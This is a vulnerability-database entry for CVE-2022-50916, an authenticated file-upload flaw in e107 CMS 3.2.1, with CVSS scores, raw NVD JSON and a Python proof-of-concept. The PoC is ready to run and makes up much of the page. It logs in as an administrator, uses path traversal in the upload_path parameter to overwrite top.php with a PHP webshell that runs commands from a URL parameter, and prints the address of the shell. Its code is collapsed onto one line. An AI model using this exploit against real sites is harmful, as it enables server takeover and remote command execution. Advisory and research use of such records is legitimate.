Security Vulnerability Report
中文
CVE-2022-50916 CVSS 7.2 HIGH

CVE-2022-50916

Published: 2026-01-13 23:15:55
Last Modified: 2026-01-16 19:16:13
Source: [email protected]

Description

e107 CMS version 3.2.1 contains a file upload vulnerability that allows authenticated administrators to override server files through the Media Manager import functionality. Attackers can exploit the upload mechanism by manipulating the upload URL parameter to overwrite existing files like top.php in the web application directory.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:e107:e107:3.2.1:*:*:*:*:*:*:* - VULNERABLE
e107 CMS <= 3.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from bs4 import BeautifulSoup # CVE-2022-50916 PoC - e107 CMS Media Manager File Upload to Override # Target: e107 CMS 3.2.1 # Vulnerability: Authenticated admin can override server files via Media Manager import TARGET_URL = "http://target.com/e107_admin/media.php" # Modify target URL USERNAME = "admin" PASSWORD = "admin123" def get_csrf_token(session, url): """Extract CSRF token from the login page""" response = session.get(url) soup = BeautifulSoup(response.text, 'html.parser') token_input = soup.find('input', {'name': 'auth-token'}) return token_input['value'] if token_input else None def login(session, username, password): """Login to e107 CMS as admin""" login_url = f"{TARGET_URL.replace('/media.php', '/index.php')}" csrf_token = get_csrf_token(session, login_url) login_data = { 'username': username, 'userpass': password, 'auth-token': csrf_token, 'login': 'login' } response = session.post(login_url, data=login_data, allow_redirects=True) return 'admin' in response.text.lower() or response.status_code == 200 def exploit_file_override(session): """Exploit the file upload vulnerability to override server files""" # Malicious PHP file content (webshell) malicious_content = b"<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" # Target file to override (top.php in web root) target_file = "top.php" # Upload endpoint with manipulated path parameter upload_url = f"{TARGET_URL}?mode=main&action=import&upload_path=../../../{target_file}" files = { 'file': (target_file, malicious_content, 'application/x-php') } response = session.post(upload_url, files=files) return response.status_code == 200 or 'success' in response.text.lower() def main(): if len(sys.argv) < 2: print("Usage: python cve-2022-50916.py <target_url>") print("Example: python cve-2022-50916.py http://vulnerable-site.com/e107_admin/") sys.exit(1) global TARGET_URL TARGET_URL = sys.argv[1] session = requests.Session() print("[*] Attempting login...") if login(session, USERNAME, PASSWORD): print("[+] Login successful!") print("[*] Exploiting file upload vulnerability...") if exploit_file_override(session): print("[+] File override successful! Webshell uploaded.") print(f"[*] Access webshell at: {TARGET_URL.replace('/media.php', '')}/top.php?cmd=id") else: print("[-] Exploitation failed.") else: print("[-] Login failed. Check credentials.") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50916", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:55.073", "lastModified": "2026-01-16T19:16:13.023", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "e107 CMS version 3.2.1 contains a file upload vulnerability that allows authenticated administrators to override server files through the Media Manager import functionality. Attackers can exploit the upload mechanism by manipulating the upload URL parameter to overwrite existing files like top.php in the web application directory."}, {"lang": "es", "value": "e107 CMS versión 3.2.1 contiene una vulnerabilidad de carga de archivos que permite a administradores autenticados sobrescribir archivos del servidor a través de la funcionalidad de importación del Gestor de Medios. Los atacantes pueden explotar el mecanismo de carga manipulando el parámetro URL de carga para sobrescribir archivos existentes como top.php en el directorio de la aplicación web."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:e107:e107:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "B1CF95DE-65CF-490D-9817-616CF704B16B"}]}]}], "references": [{"url": "https://e107.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://e107.org/download", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50910", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/e-cms-upload-restriction-bypass-authenticated-admin-server-file-override", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.